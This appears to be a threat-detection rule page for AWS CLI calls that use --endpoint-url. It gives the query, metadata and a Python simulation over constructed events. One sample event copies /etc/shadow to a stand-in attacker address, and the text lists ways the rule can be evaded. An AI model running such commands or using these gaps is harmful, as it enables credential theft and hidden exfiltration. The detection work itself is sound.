AWS CLI Command with Custom Endpoint URL
Detects use of the AWS CLI with the --endpoint-url argument, which sends requests for an AWS service to a URL the caller chooses instead of the service's default regional endpoint. An adversary can use it to direct API calls, and any data they carry, at infrastructure they control, bypassing controls and logging that assume traffic reaches AWS (such requests never appear in the victim account's CloudTrail). This behavior may indicate interaction with unauthorized or compromised infrastructure, data exfiltration, or other malicious activity disguised as routine AWS operations. The flag also has legitimate uses (local AWS emulators, S3-compatible object stores, VPC or FIPS endpoints), which is why this is a new_terms rule that alerts only on first-seen combinations of the fields it tracks rather than on every invocation.
Rule type: new_terms
Rule indices:
- logs-endpoint.events.process-*
Severity: medium
Risk score: 47
Runs every: 5m
Searches indices from: now-9m (Date Math format, see also Additional look-back time)
Maximum alerts per execution: 100
References:
Tags:
- Data Source: Elastic Defend
- Domain: Endpoint
- OS: Linux
- Use Case: Threat Detection
- Tactic: Command and Control
Version: 1
Rule authors:
- Elastic
Rule license: Elastic License v2
Rule query
host.os.type: "linux" and event.category: "process" and process.name: "aws" and process.args: "--endpoint-url"
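The query above, evaluated over constructed sample events in Python, as an added example that is not Elastic's rule code and not part of the original page. It implements the four KQL terms with keyword-field semantics (exact match on a scalar or on any array element) and a simplified model of new_terms evaluation, where a set of previously seen values stands in for the rule's history window. The fields the new_terms logic keys on (host.id and user.name) are an assumption, since the page does not list them; the events, host names, user names and the 203.0.113.10 address are all constructed.

```python
from typing import Any, Dict, Iterable, List, Optional, Tuple


def _event(os_type: str, host_id: str, user: str, args: List[str]) -> Dict[str, Any]:
    """Build a minimal ECS-shaped process event (constructed test data)."""
    return {
        "host": {"os": {"type": os_type}, "id": host_id},
        "user": {"name": user},
        "event": {"category": ["process"]},
        "process": {"name": "aws", "args": args},
    }


# Constructed sample events, not real telemetry. 203.0.113.10 is an RFC 5737
# documentation address standing in for attacker-controlled infrastructure.
SAMPLE_EVENTS = [
    # 0: developer pointing the CLI at a local S3 emulator (benign, but matches).
    _event("linux", "dev-01", "alice",
           ["aws", "--endpoint-url", "http://localhost:4566", "s3", "ls"]),
    # 1: same host/user again: matches the query, but is not a new term.
    _event("linux", "dev-01", "alice",
           ["aws", "--endpoint-url", "http://localhost:4566",
            "s3", "cp", "build.tgz", "s3://artifacts/"]),
    # 2: first time this host/user pair uses the flag, toward an external host.
    _event("linux", "web-07", "www-data",
           ["aws", "s3", "cp", "/etc/shadow", "s3://loot/",
            "--endpoint-url", "https://203.0.113.10"]),
    # 3: same intent, but "--endpoint-url=<url>" is a single argv element, so
    #    the rule's exact-term match on process.args does not fire.
    _event("linux", "web-07", "www-data",
           ["aws", "s3", "ls", "--endpoint-url=https://203.0.113.10"]),
    # 4: excluded by host.os.type.
    _event("windows", "ws-11", "bob",
           ["aws", "--endpoint-url", "https://203.0.113.10", "s3", "ls"]),
]


def _get(event: Dict[str, Any], path: str) -> Any:
    """Resolve a dotted ECS field path; None if any segment is missing."""
    cur: Any = event
    for key in path.split("."):
        if not isinstance(cur, dict) or key not in cur:
            return None
        cur = cur[key]
    return cur


def _term(value: Any, term: str) -> bool:
    """KQL `field: "term"` on a keyword field: exact match against a scalar
    or against any element of an array (process.args, event.category)."""
    return term in value if isinstance(value, list) else value == term


def matches_query(event: Dict[str, Any]) -> bool:
    """host.os.type: "linux" and event.category: "process"
    and process.name: "aws" and process.args: "--endpoint-url" """
    return (_term(_get(event, "host.os.type"), "linux")
            and _term(_get(event, "event.category"), "process")
            and _term(_get(event, "process.name"), "aws")
            and _term(_get(event, "process.args"), "--endpoint-url"))


def endpoint_url(event: Dict[str, Any]) -> Optional[str]:
    """URL handed to --endpoint-url, for triage. Accepts both the separate
    argument and the "=" spelling, so it also shows what the query misses."""
    args = _get(event, "process.args") or []
    for i, arg in enumerate(args):
        if arg == "--endpoint-url" and i + 1 < len(args):
            return args[i + 1]
        if arg.startswith("--endpoint-url="):
            return arg.split("=", 1)[1]
    return None


def new_terms_alerts(events: Iterable[Dict[str, Any]],
                     fields: Tuple[str, ...] = ("host.id", "user.name"),
                     seen: Optional[set] = None) -> List[Dict[str, Any]]:
    """Simplified new_terms evaluation: of the events matching the query,
    alert only when the combination of `fields` has not been seen before.
    `seen` plays the role of the rule's history window (assumed fields)."""
    seen = set() if seen is None else seen
    alerts: List[Dict[str, Any]] = []
    for ev in events:
        if not matches_query(ev):
            continue
        key = tuple(_get(ev, f) for f in fields)
        if key in seen:
            continue
        seen.add(key)
        alert = dict(zip(fields, key))
        alert["endpoint_url"] = endpoint_url(ev)
        alerts.append(alert)
    return alerts
```

Running `new_terms_alerts(SAMPLE_EVENTS)` yields two alerts, for dev-01/alice and web-07/www-data; the second dev-01 event matches the query but is suppressed as an already-seen term. Event 3 shows a coverage gap worth knowing about when tuning: `process.args: "--endpoint-url"` is an exact match on one argv element, so the `--endpoint-url=<url>` spelling is not caught, and neither is an endpoint set through the AWS_ENDPOINT_URL environment variable or the `endpoint_url` setting in the CLI config file, which never appear in process.args at all.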
Framework: MITRE ATT&CK™
- Tactic:
  - Name: Command and Control
  - ID: TA0011
  - Reference URL: https://attack.mitre.org/tactics/TA0011/
- Technique:
  - Name: Web Service
  - ID: T1102
  - Reference URL: https://attack.mitre.org/techniques/T1102/